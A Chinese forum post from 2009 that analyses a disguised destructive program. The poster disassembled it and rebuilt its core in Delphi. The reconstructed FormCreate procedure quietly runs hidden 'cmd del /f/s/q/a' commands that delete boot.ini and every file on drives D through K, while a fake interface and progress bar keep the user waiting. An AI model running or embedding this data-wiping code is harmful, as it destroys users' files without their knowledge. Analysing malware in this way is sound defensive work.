吉他师傅
UID277124
好友
回帖0
主题
精华
积分1573
阅读权限255
注册时间2006-5-13
最后登录1970-1-1
在线时间 小时
|
发表于 2009-7-27 14:29:14
|
显示全部楼层
反汇编看了一下,用DELPHI模拟还原了一下代码。主要程序大概如下,阴险的是,程序从双击启动开始就不停的删除D-K盘的所有文件(保留文件夹),而整个软件界面和按钮、进度条都是掩饰物拖延时间,好防止用户退出,让病毒能删更多的文件。
procedure TForm1.FormCreate(Sender: TObject);
begin
WinExec('cmd /C del C:\boot.ini /f/s/q/a',SW_HIDE);
WinExec('cmd /C del D:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del E:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del F:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del G:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del H:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del I:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del J:\*.* /f/s/q/a',SW_HIDE);
WinExec('cmd /C del K:\*.* /f/s/q/a',SW_HIDE);
end; |
|